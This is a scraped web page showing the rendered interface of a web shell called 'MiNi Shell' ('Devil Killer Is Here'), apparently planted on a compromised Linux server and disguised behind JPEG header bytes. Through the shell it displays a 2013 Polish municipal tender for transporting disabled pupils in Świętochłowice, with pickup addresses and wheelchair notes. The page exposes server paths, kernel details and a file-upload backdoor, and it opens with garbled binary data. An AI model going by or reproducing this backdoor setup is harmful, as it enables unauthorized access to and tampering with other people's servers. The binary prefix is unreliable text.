JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130816/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130816/331514-N-2013.html

<p class="kh_header"><b>Świętochłowice: Przewóz uczniów niepełnosprawnych zamieszkałych w Świętochłowicach wraz z ich opieką w czasie transportu do placówek oświatowych w roku szkolnym 2013/2014</b><br>
<b>Numer ogłoszenia: 331514 - 2013; data zamieszczenia: 16.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Świętochłowice reprezentowana przez Prezydenta Miasta Świętochłowice , ul. Katowicka 54, 41-600 Świętochłowice, woj. śląskie, tel. 32 3491 800, faks 32 349 18 12.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.swietochlowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przewóz uczniów niepełnosprawnych zamieszkałych w Świętochłowicach wraz z ich opieką w czasie transportu do placówek oświatowych w roku szkolnym 2013/2014.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług w zakresie przewozu uczniów niepełnosprawnych zamieszkałych w Świętochłowicach wraz z ich opieką w czasie transportu do placówek oświatowych w okresie od 02.09.2013 r. do 27.06.2014 r. (z pominięciem dni wolnych od zajęć dydaktycznych w szkołach), tj. w ciągu 188 dni kalendarzowych w roku szkolnym 2013/2014, z podziałem na dwie (2) części:
Część I
Transport 24 uczniów będzie odbywał się do następujących placówek oświatowych poza Miastem Świętochłowice:
1.Szkoła Podstawowa Nr 37 przy ul. Lompy 17 w Katowicach. Przewóz 4 osób z:
- Plac Zawadzkiego 5,
- ul. Chorzowska 102,
- ul. Wodna 1,
- ul. Chorzowska 42.
2.Zespół Szkolno - Przedszkolnego dla Dzieci Niesłyszących i Słabo Słyszących przy ul. Grażyńskiego 17 w Katowicach
Przewóz 7 osób z:
- ul. Wyzwolenia 75,
- ul. Sawickiej 4,
- ul. Górnicza 13,
- ul. Powstańców Śląskich 23,
- ul. Wyzwolenia 75,
- ul. Chorzowska 42.
3.Zasadnicza Szkoła Zawodowa Specjalna ul. Dolnej Wsi 74 w Gliwicach Przewóz 2 osób z:
- ul. Świętokrzyska 22 - wózek inwalidzki,
- ul. Świętokrzyska 24 - wózek inwalidzki.
4.Zespół Szkół Zawodowych Specjalnych Nr 6 ul. Rolna 22 w Katowicach.
Przewóz 2 osób z:
 - ul. Metalowców 4 - wózek inwalidzki, możliwe że elektryczny,
 - ul. Metalowców 4 - wózek inwalidzki, możliwe że elektryczny.
5.Ośrodek Rewalidacyjno - Wychowawczy Nasz Dom w Centrum Edukacji i Rehabilitacji ul. Wyciska 5 w Zabrzu.
Przewóz 2 osób z:
- ul. Hutnicza 1e,
- ul. Sienkiewicza 3.
6.Zespół Szkół Specjalnych Nr 3 ul. 3-go Maja 16 w Chorzowie.
Przewóz 3 osób z:
- ul. Szkolna 21,
- ul. Wiechaczka 17 - wózek inwalidzki,
- ul. Krasickiego 9.
7.Zespół Szkół Specjalnych Nr 8 ul. Szkolna 5 w Katowicach.
Przewóz 1 osoby z:
- ul. Komandra 2b.
8.Specjalistyczne Niepubliczne Przedszkole Edukacyjno - Rehabilitacyjne ul. Ułańska 5a w Katowicach
Przewóz 1 osoby z:
- ul. Granitowa 22.
9.Szkoła Podstawowa Nr 66 ul. Krzywoustego 7 w Katowicach.
 Przewóz 1 osoby z:
 - ul. Polaka 12 - wózek inwalidzki.
10.Szkoła Podstawowa Nr 32 ul. Kaliny 61 w Chorzowie.
Przewóz 1 osoby z:
- ul. Akacjowa 9.
Część II
Transport 66 uczniów będzie odbywał się do następujących placówek oświatowych na terenie Miasta Świętochłowice:
Szkoła Podstawowa Specjalna nr 10 ul. Łagiewnicka 65 w Świętochłowicach.
Przewóz 33 osób z:
- ul. Dworcowa 23,
- ul. Hutnicza 11a - wózek inwalidzki,
- ul. Świdra 21,
- ul. Matejki 6,
- ul. Szkolna 16,
- ul. Wojska Polskiego 70,
- ul. Reja 6,
- ul. Krasickiego 5b,
- ul. Wojska Polskiego 69,
- ul. Brzozowa 3,
- ul. Wolności 4,
- ul. Barlickiego 25,
- ul. Bytomska 9a,
- ul. Solidarności 3,
- ul. Żołnierska 11,
- ul. Jodłowa 3,
- ul. Ślęzan 25,
- ul. Polna 19,
- pl. Zawadzkiego 8,
- ul. Barlickiego 25,
- ul. Barlickiego 25,
- ul. Polna 38,
- ul. Szpitalna 20,
- ul. Katowicka 45g,
- ul. Drzymały 10,
- ul. Hutnicza 6a,
- ul. Polna 24,
- ul. Polna 22,
- ul. Sawickiej 19,
- ul. Ślęzan 25,
- ul. Gwarecka 59, Chorzów, (odbiór ucznia: róg ul. Szkolnej i Al. Parkowej w Świętochłowicach)
- ul. Okrzei 10,
- ul. Wojska Polskiego 71.
Przedszkole Miejskie Nr 12 ul. Harcerska 10 w Świętochłowicach.
Przewóz 1 osoby z:
- ul. Kościelna 27b.
Przedszkole Miejskie Nr 8 ul. Zubrzyckiego 10 w Świętochłowicach.
Przewóz 3 osób z:
- ul. Świdra 21,
- ul. Świdra 18,
- ul. Sawickiej 2.
Zespół Szkół Ogólnokształcących Nr 2 ul. Sudecka 5 w Świętochłowicach.
Przewóz 2 osób z:
- ul. Wierzbowej 4,
- ul. Katowickiej 33a.
Zespół Szkół specjalnych ul. Szkolna 13 w Świętochłowicach.
Przewóz 7 osób z:
- ul. Hajduki 6,
- ul. 1 maja 24,
- ul. Sadowa 9,
- ul. Wojska Polskiego 76,
- ul. Imieli 11,
- ul. Moniuszki 12,
- ul. Mickiewicza 7.
Przedszkole Miejskie Nr 9 ul. Sportowa 6 w Świętochłowicach.
Przewóz 4 osób z:
- ul. Tatrzańska 6,
- ul. Górnicza 10,
- ul. Katowicka 71,
- ul. Imieli 8.
Szkoła Podstawowa Nr 17 ul. Armii Ludowej 14 w Świętochłowicach.
Przewóz 16 osób z:
- ul. Granitowa 24,
- ul. Cmentarna 8,
- ul. Żołnierska 18,
- ul. Krótka 2,
- ul. Hajduki 34,
- ul. Korfantego 10,
- ul. Sawickiej 4,
- ul. Barlickiego 28,
- ul. Okrzei 10,
- ul. Hajduki 19,
- ul. Sądowa 5,
- ul. Jodłowa 5 - wózek inwalidzki,
- ul. Sienkiewicza 3,
- ul. Hajduki 12,
- ul. Hajduki 12,
- ul. Jodłowa 7.
Zamawiający wymaga aby Wykonawca zatrudnił osobę do pełnienia funkcji opiekuna przeszkolonego w zakresie udzielania pierwszej pomocy medycznej lub przedmedycznej do obowiązków, którego będzie należało:
-zapewnienie bezpiecznego wsiadania do pojazdu oraz wysiadania z pojazdu dowożonych do szkół dzieci;
-zapewnienie bezpieczeństwa w trakcie przewozu dzieci do szkół;
-opieka i zwracanie uwagi na właściwe zachowanie się dzieci w czasie przejazdu;
-w drodze powrotnej przekazanie dziecka oczekującemu opiekunowi;
-ustalanie sposobu porozumiewania się z kierowcą w czasie jazdy;
-w przypadku stwierdzenia sytuacji zagrażającej bezpieczeństwu dzieci w pojeździe, nie dopuszczenie do ich przewozu;
-w przypadku stwierdzenia sytuacji zagrażającej bezpieczeństwu dzieci nie dopuszczenie do ich wsiadania do pojazdu lub wysiadania z pojazdu.
Wykonawca zobowiązuje się w przypadku awarii pojazdu do niezwłocznego powiadomienia o tym fakcie szkoły oraz rodziców przewożonych uczniów;
Wykonawca ponosi odpowiedzialność za zapewnienie bezpiecznych i higienicznych warunków przewozu dzieci i ich opiekuna/opiekunów;
Wykonawca ponosi odpowiedzialność za wszelkie szkody wyrządzone dzieciom i opiekunowi w trakcie przewozu oraz osobom trzecim w związku z wykonywaną usługą. 
Wykonawca zobowiązuje się do zawarcia ubezpieczenia od następstw nieszczęśliwych wypadków i poniesienia związanych z tym kosztów..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 27.06.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca w zakresie posiadania uprawnień do wykonywania określonej działalności musi posiadać aktualne zezwolenie na wykonywanie transportu drogowego osób zgodnie z przepisami ustawy z dnia 26.09.2001 o transporcie drogowym ( tekst jednolity Dz. U. z 2007, Nr 125, poz. 874 z późn. zm.)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie posiadania wiedzy i doświadczenia Wykonawca musi wykazać, iż:
- w przypadku składania oferty na I część zamówienia w okresie 3 ostatnich lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności  jest krótszy niż  3 lata to za okres prowadzenia działalności wykonał,  a w przypadku świadczeń okresowych lub ciągłych również wykonywanych  jedną  ( 1 )  usługę, której przedmiotem były usługi przewozowe osób niepełnosprawnych o wartości usługi  nie mniejszej niż 100.000zł brutto.
- w przypadku składania oferty na II część zamówienia w okresie 3 ostatnich lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności  jest krótszy niż  3 lata to za okres prowadzenia działalności wykonał,  a w przypadku świadczeń okresowych lub ciągłych również wykonywanych  jedną  ( 1 )  usługę, której przedmiotem były usługi przewozowe osób niepełnosprawnych o wartości usługi  nie mniejszej niż 80.000zł brutto.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie dysponowania odpowiednim potencjałem technicznym Wykonawca  musi wykazać, że dysponuje lub będzie dysponować w każdej części zamówienia co najmniej 4 sprawnymi technicznie środkami transportu do przewozu osób niepełnosprawnych, w tym co najmniej 1 pojazd dostosowany do przewozu osób niepełnosprawnych poruszających się na wózku inwalidzkim lub wózku inwalidzkim elektrycznym. Samochód ten powinien być wyposażony w rampę lub windę umożliwiającą wjazd wózkiem  z osobą niepełnosprawną, odpowiednie pasy bezpieczeństwa oraz powinien posiadać co najmniej 1 miejsce dla pasażera przewożonego we wózku inwalidzkim uniemożliwiającego jego przesuwanie podczas jazdy  np. szyny do mocowania wózków. Natomiast siedzenia pasażerów powinny być wyposażone w pasy bezpieczeństwa i wysokie oparcia lub oparcia z zagłówkiem. Pojazd musi zapewniać swobodny dostęp opiekuna do każdego dziecka. Pojazdy muszą posiadać aktualne dowody rejestracyjne oraz polisy ubezpieczenia OC i NNW.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca w zakresie dysponowania osobami zdolnymi do wykonania zamówienia musi wykazać, iż dysponuje lub będzie dysponował osobami zdolnymi do wykonania niniejszego zamówienia tj.
- kierowcami w liczbie nie mniejszej niż liczba pojazdów tj. minimum 4 kierowców posiadających prawo jazdy, świadectwo kwalifikacji zawodowych zgodnie z przepisem art. 39 a ust. 1 ustawy z  dnia 26.09.2001 o transporcie drogowym (tekst jednolity Dz. U. z 2007, Nr 125, poz. 874 z późn. zm.),
- opiekunami w liczbie nie mniejszej niż liczba pojazdów tj. minimum 4 opiekunów posiadających ukończony kurs pierwszej pomocy i /lub kurs opiekuna osób niepełnosprawnych</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie sytuacji ekonomicznej i finansowej Wykonawca musi wykazać, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia   na kwotę nie mniejszą niż 100.000zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawcy zobowiązani są złożyć następujące dokumenty oraz oświadczenia;
1. oświadczenia oraz dokumenty wskazane  w rozdziale 6 specyfikacji, 
2. wypełniony i podpisany  formularz ofertowy (według załącznika nr 1),
3. oświadczenie o części zamówienia, której wykonanie, Wykonawca zamierza powierzyć podwykonawcom 
( w treści formularza ofertowego  pkt 4) w przypadku powierzenia przez Wykonawcę części zamówienia podwykonawcom,
4. pełnomocnictwo do reprezentowania w postępowaniu albo do reprezentowania w postępowaniu i zawarciu umowy, w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodnie z art. 23 ustawy (dotyczy również wspólników spółki cywilnej),
5. pełnomocnictwo do występowania w imieniu Wykonawcy, w przypadku gdy dokumentów składających się na ofertę nie podpisuje osoba uprawniona do reprezentowania Wykonawcy zgodnie z odpisem z Krajowego Rejestru Sądowego lub Wykonawca  w przypadku osób fizycznych.
6. informację o  przynależności do grupy kapitałowej składaną w trybie art. 26 ust.2d ustawy ( wzór informacji -załącznik nr 4),</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Stosownie do treści art. 144 ustawy  Zamawiający  przewiduje możliwości  zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy:
a) w przypadku zmiany szkoły placówki w trakcie roku szkolnego 2013/2014 do których uczęszczają niepełnosprawni uczniowie,
b) w przypadku rezygnacji z dowozu ucznia, zastąpienie  jednego dziecka innym dzieckiem, którego podanie wpłynęło w trakcie realizacji zamówienia, bez względu na adres zamieszkania i adres placówki do której dziecko będzie dowożone,
c) w przypadku zmiany  adresu zamieszkania  w trakcie roku szkolnego niepełnosprawnych uczniów,  
d) konieczności zmiany osób, które będą wykonywać usługi ( kierowcy, opiekunowie)  z przyczyn nieleżących  po stronie Wykonawcy ( np. długotrwała choroba, śmierć, utrata uprawnień).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.swietochlowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział  Zamówień Publicznych  - Urząd Miejski Świętochłowice ul. Katowicka 54.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.08.2013 godzina 10:00, miejsce: Urząd Miejski Świętochłowice ul. Katowicka 54, Wydział  Zamówień Publicznych  pok.115 -116 ( parter ).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com